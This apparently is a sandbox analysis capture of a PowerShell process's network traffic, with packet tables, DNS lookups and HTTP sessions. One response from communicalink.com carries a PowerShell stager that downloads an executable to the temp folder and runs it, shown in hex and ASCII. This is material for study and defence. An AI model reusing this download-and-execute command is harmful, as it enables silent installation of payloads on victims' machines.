Oct 5, 2023 18:48:02.010332108 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.161217928 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.161351919 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.161374092 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.161403894 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.161439896 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.161458969 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.161788940 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.161860943 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.162130117 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.162204027 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.162550926 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.162616968 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.162906885 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.162971973 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.163362026 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.163434029 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.163892984 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.163965940 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.164302111 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.164369106 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.164638042 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.164700985 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.165065050 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.165121078 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.165318012 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.165379047 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.165632010 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.165720940 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.166050911 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.166111946 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.166682959 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.166744947 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.167053938 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.167112112 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.167273045 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.167337894 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.167530060 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.167620897 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.167757034 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.167855978 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.167978048 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.168035984 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.168344975 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.168404102 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.168644905 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.168704987 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.168869019 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.168931007 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.169183969 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.169241905 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.169441938 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.169502020 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.169778109 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.169836044 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.170133114 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.170193911 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.170387983 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.170445919 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.170619011 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.170681953 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.170908928 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.170967102 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.171125889 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.171185970 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.171385050 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.171443939 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.171607018 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.171662092 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.171947956 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.172009945 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.172281027 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.172338009 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.172498941 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.172557116 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.172763109 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.172818899 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.173084974 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.173150063 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.173310041 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.173362970 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.173525095 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.173583031 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.173748016 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.173806906 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.174014091 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.174071074 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.174230099 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.174292088 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.174397945 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.174472094 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.174523115 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.174576044 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.174655914 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.174710989 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.174958944 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.175009012 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.175117016 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.175175905 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.175340891 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.175391912 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.175482988 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.175537109 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.175802946 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.175858021 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.175956964 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.176021099 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.176099062 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.176151991 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.176213026 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.176270962 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.176388979 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.176440954 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.176686049 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.176738977 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.176800013 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.176856041 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.177040100 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.177099943 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.177345037 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.177396059 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.177561998 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.177614927 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.177742958 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.177795887 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.177882910 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.177937984 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.178067923 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.178118944 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.178174019 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.178225994 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.178437948 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.178492069 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.178567886 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.178627014 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.178867102 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.178920984 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.178972960 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.179029942 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.179269075 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.179328918 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.179521084 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.179577112 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.179668903 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.179722071 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.179877043 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.179934978 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.180083990 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.180140018 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.180397987 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.180455923 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.180665016 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.180699110 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.180716038 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.180732012 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.180749893 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.180758953 CEST	443	49694	93.93.131.124	192.168.2.3
Oct 5, 2023 18:48:02.180804968 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.181238890 CEST	49694	443	192.168.2.3	93.93.131.124
Oct 5, 2023 18:48:02.580357075 CEST	49692	80	192.168.2.3	172.67.177.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2023 18:47:56.736896992 CEST	53607	53	192.168.2.3	1.1.1.1
Oct 5, 2023 18:47:56.893769026 CEST	53	53607	1.1.1.1	192.168.2.3
Oct 5, 2023 18:47:57.607836962 CEST	60145	53	192.168.2.3	1.1.1.1
Oct 5, 2023 18:47:58.263809919 CEST	53	60145	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 5, 2023 18:47:56.736896992 CEST	192.168.2.3	1.1.1.1	0x5a5a	Standard query (0)	communicalink.com	A (IP address)	IN (0x0001)	false
Oct 5, 2023 18:47:57.607836962 CEST	192.168.2.3	1.1.1.1	0xb2df	Standard query (0)	the.earth.li	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 5, 2023 18:47:56.893769026 CEST	1.1.1.1	192.168.2.3	0x5a5a	No error (0)	communicalink.com	172.67.177.73	A (IP address)	IN (0x0001)	false
Oct 5, 2023 18:47:56.893769026 CEST	1.1.1.1	192.168.2.3	0x5a5a	No error (0)	communicalink.com	104.21.75.133	A (IP address)	IN (0x0001)	false
Oct 5, 2023 18:47:58.263809919 CEST	1.1.1.1	192.168.2.3	0xb2df	No error (0)	the.earth.li	93.93.131.124	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

the.earth.li

communicalink.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49693	93.93.131.124	443	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49694	93.93.131.124	443	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49692	172.67.177.73	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Oct 5, 2023 18:47:57.049932957 CEST	0	OUT	GET /index.php HTTP/1.1 Host: communicalink.com Connection: Keep-Alive
Oct 5, 2023 18:47:57.586942911 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 05 Oct 2023 16:47:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=57V4VmQs%2Fuqfe2FYszWtV93%2BjSV3H7h3Pppl5C%2FgJZ8DkHeVqUTWjab2AeMzVOWcttU%2BODL8rka7lFzrMJIuFwKUozXLxGQvBtIRHd150OvJCxdrCUhjpH5lJeN%2B%2B5ApV04PbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8117263dfa1c08e8-LAX alt-svc: h3=":443"; ma=86400 Data Raw: 63 32 0d 0a 24 70 61 74 68 20 3d 20 24 45 6e 76 3a 74 65 6d 70 2b 27 5c 73 78 6e 6f 58 2e 65 78 65 27 3b 20 24 63 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 24 63 6c 69 65 6e 74 2e 64 6f 77 6e 6c 6f 61 64 66 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 6c 61 74 65 73 74 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 27 2c 24 70 61 74 68 29 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 24 70 61 74 68 20 0d 0a Data Ascii: c2$path = $Env:temp+'\sxnoX.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe',$path); Start-Process -FilePath $path
Oct 5, 2023 18:47:57.586971045 CEST	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49693	93.93.131.124	443	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Direction	Data
2023-10-05 16:47:58 UTC	OUT	GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1 Host: the.earth.li Connection: Keep-Alive
2023-10-05 16:47:59 UTC	IN	HTTP/1.1 302 Found Date: Thu, 05 Oct 2023 16:47:59 GMT Server: Apache Location: https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe Content-Length: 302 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-10-05 16:47:59 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 37 39 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe">here</a>.</p><hr><address>Apache Server at

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49694	93.93.131.124	443	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-05 16:47:59 UTC	0	OUT	GET /~sgtatham/putty/0.79/w32/putty.exe HTTP/1.1 Host: the.earth.li
2023-10-05 16:48:00 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 05 Oct 2023 16:48:00 GMT Server: Apache Last-Modified: Sat, 26 Aug 2023 07:50:35 GMT ETag: "16a120-603ceb76f7865" Accept-Ranges: bytes Content-Length: 1483040 Connection: close Content-Type: application/x-msdos-program
2023-10-05 16:48:00 UTC	0	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 b3 ad e9 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 5a 0c 00 00 ea 09 00 00 00 00 00 26 e8 09 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 16 00 00 04 00 00 1e 23 17 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 d0 0f 00 b4 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELdZ&@#@h
2023-10-05 16:48:00 UTC	8	IN	Data Raw: 09 00 83 c4 0c ff 34 24 ff 15 40 db 4f 00 56 e8 2d 6e 03 00 83 c4 04 55 53 57 68 84 e1 4d 00 e8 5d 5d 03 00 83 c4 10 89 c6 bf 01 00 00 00 e9 32 08 00 00 3d 80 01 00 00 0f 84 d7 08 00 00 3d 90 01 00 00 0f 85 47 09 00 00 6a 01 68 d4 70 4c 00 ff 35 38 17 50 00 89 d6 e8 34 d9 00 00 89 f2 83 c4 0c e9 b6 09 00 00 83 f8 50 0f 84 b3 08 00 00 83 f8 60 0f 85 17 09 00 00 ff 35 38 17 50 00 89 d6 e8 db b4 00 00 e9 8d 09 00 00 3d a0 01 00 00 0f 84 e1 08 00 00 3d 70 f0 00 00 0f 85 ef 08 00 00 81 fa 12 01 00 00 0f 85 70 09 00 00 c6 05 cb 1d 50 00 01 55 53 68 12 01 00 00 57 ff 15 98 d7 4f 00 89 c6 c6 05 cb 1d 50 00 00 8b 8c 24 80 08 00 00 31 e1 e8 68 b7 09 00 89 f0 e9 59 09 00 00 31 c0 f6 c3 10 0f 94 c0 83 c8 02 f6 c3 01 89 ef bd 01 00 00 00 0f 44 e8 e8 64 7d 00 00 88 04 Data Ascii: 4$@OV-nUSWhM]]2==GjhpL58P4P`58P==ppPUShWOP$1hY1Dd}
2023-10-05 16:48:00 UTC	16	IN	Data Raw: c4 0c a3 10 17 50 00 56 6a 00 6a 00 e8 10 3f 03 00 83 c4 0c a3 14 17 50 00 6a 78 ff 35 f0 0b 50 00 e8 cb 2b 03 00 83 c4 08 0f b6 f0 c1 e6 15 81 ce 00 00 cf 00 6a 7a ff 35 f0 0b 50 00 e8 5f 2c 03 00 83 c4 08 89 f1 81 e1 00 00 ea 00 89 fa 84 d2 0f 45 f1 83 f8 01 0f 44 f1 6a 61 ff 35 f0 0b 50 00 e8 8a 2b 03 00 83 c4 08 0f b6 f8 8d 2c fd 00 00 00 00 68 8a 00 00 00 ff 35 f0 0b 50 00 e8 6d 2b 03 00 83 c4 08 8d 3c fd 00 02 00 00 84 c0 0f 44 fd c6 05 18 17 50 00 01 e8 82 c5 ff ff 6a 00 ff 74 24 5c 6a 00 6a 00 53 ff 74 24 18 68 00 00 00 80 68 00 00 00 80 56 8b 4c 24 24 89 cb 51 50 57 ff 15 8c d7 4f 00 a3 04 00 50 00 85 c0 75 1a ff 15 f8 d9 4f 00 50 e8 c4 83 03 00 83 c4 04 50 68 e3 0b 4e 00 e8 66 08 00 00 c7 05 30 17 50 00 00 00 00 00 c7 05 2c 17 50 00 00 00 00 00 Data Ascii: PVjj?Pjx5P+jz5P_,EDja5P+,h5Pm+<DPjt$\jjSt$hhVL$$QPWOPuOPPhNf0P,P
2023-10-05 16:48:00 UTC	24	IN	Data Raw: b8 8a 7f 00 00 83 f9 01 74 1e 85 c9 75 56 31 c0 80 3d a1 17 50 00 00 0f 94 c0 0d 00 7f 00 00 31 db eb 05 b8 02 7f 00 00 50 6a 00 ff 15 70 d8 4f 00 89 c6 50 6a f4 ff 35 04 00 50 00 ff 15 dc d8 4f 00 56 ff 15 e4 d8 4f 00 38 1d a0 17 50 00 74 10 0f b6 c3 50 ff 15 18 d9 4f 00 88 1d a0 17 50 00 5e 5b c3 68 78 04 00 00 68 ba 31 4f 00 68 02 8b 4f 00 e8 0c 71 0a 00 83 c4 0c e8 01 00 00 00 cc e8 2c 78 0a 00 cc cc cc cc cc cc cc cc cc cc cc 57 56 83 3d a4 17 50 00 00 74 17 68 06 13 00 00 68 ba 31 4f 00 68 f8 2e 4f 00 e8 d4 70 0a 00 83 c4 0c a1 04 00 50 00 31 ff 85 c0 74 1e 50 ff 15 f4 d7 4f 00 85 c0 74 13 89 c6 6a 00 ff 35 78 17 50 00 50 ff 15 04 d7 4f 00 89 f7 89 3d a4 17 50 00 85 ff 0f 95 c0 5e 5f c3 cc cc cc cc cc cc cc 55 53 57 56 83 ec 08 8d 7c 24 38 8b 6c 24 Data Ascii: tuV1=P1PjpOPj5POVO8PtPOP^[hxh1OhOq,xWV=Pthh1Oh.OpP1tPOtj5xPPO=P^_USWV\|$8l$
2023-10-05 16:48:00 UTC	32	IN	Data Raw: 8b 4c 24 10 31 e1 e8 76 5a 09 00 83 c4 14 5e 5f c3 a1 70 17 50 00 85 c0 74 0d 8b 08 ff 74 24 08 50 ff 51 34 83 c4 08 c3 cc cc cc cc cc cc cc cc cc 57 56 a1 04 00 50 00 31 f6 85 c0 74 1e 50 ff 15 f4 d7 4f 00 85 c0 74 13 89 c7 6a 00 ff 35 78 17 50 00 50 ff 15 04 d7 4f 00 89 fe 89 f0 5e 5f c3 55 53 57 56 81 ec ac 00 00 00 89 54 24 14 89 ca 8b bc 24 cc 00 00 00 a1 34 00 50 00 31 e0 31 db 89 f9 83 e1 03 0f 95 c3 83 c3 01 0f af 1d 00 17 50 00 8b 8c 24 c8 00 00 00 89 0c 24 c1 e9 16 80 e1 01 89 84 24 a8 00 00 00 89 de d3 e3 83 e7 03 74 15 8d 04 12 8b 0d 38 17 50 00 3b 81 2c 01 00 00 0f 8d 53 0f 00 00 a1 04 17 50 00 31 ed f7 84 24 c8 00 00 00 00 00 00 40 75 0a c7 44 24 0c 00 00 00 00 eb 49 83 3d b0 17 50 00 00 74 0f 8b 0d 38 17 50 00 80 b9 43 01 00 00 00 74 de 8b Data Ascii: L$1vZ^_pPtt$PQ4WVP1tPOtj5xPPO^_USWVT$$4P11P$$$t8P;,SP1$@uD$I=Pt8PCt
2023-10-05 16:48:01 UTC	39	IN	Data Raw: 89 44 24 1a d9 6c 24 1a db 5c 24 40 d9 6c 24 06 8b 44 24 40 39 c6 0f 4c f0 d9 c0 d8 84 24 a4 00 00 00 d8 84 24 a8 00 00 00 d8 84 24 ac 00 00 00 d9 7c 24 04 0f b7 44 24 04 0d 00 0c 00 00 66 89 44 24 18 d9 6c 24 18 db 5c 24 44 d9 6c 24 04 8b 44 24 44 39 c6 0f 4c f0 d9 c0 d8 84 24 b0 00 00 00 d8 84 24 b4 00 00 00 d8 84 24 b8 00 00 00 d9 7c 24 02 0f b7 44 24 02 0d 00 0c 00 00 66 89 44 24 16 d9 6c 24 16 db 5c 24 48 d9 6c 24 02 8b 44 24 48 39 c6 0f 4c f0 d8 84 24 bc 00 00 00 d8 84 24 c0 00 00 00 d8 84 24 c4 00 00 00 d9 3c 24 0f b7 04 24 0d 00 0c 00 00 66 89 44 24 14 d9 6c 24 14 db 5c 24 4c d9 2c 24 8b 44 24 4c 39 c6 0f 4c f0 eb 03 8b 76 18 8b 8c 24 c8 00 00 00 31 e1 e8 5d 3a 09 00 89 f0 81 c4 cc 00 00 00 5e c3 cc cc cc ff 35 04 00 50 00 ff 15 68 d8 4f 00 85 c0 Data Ascii: D$l$\$@l$D$@9L$$$\|$D$fD$l$\$Dl$D$D9L$$$\|$D$fD$l$\$Hl$D$H9L$$$<$$fD$l$\$L,$D$L9Lv$1]:^5PhO
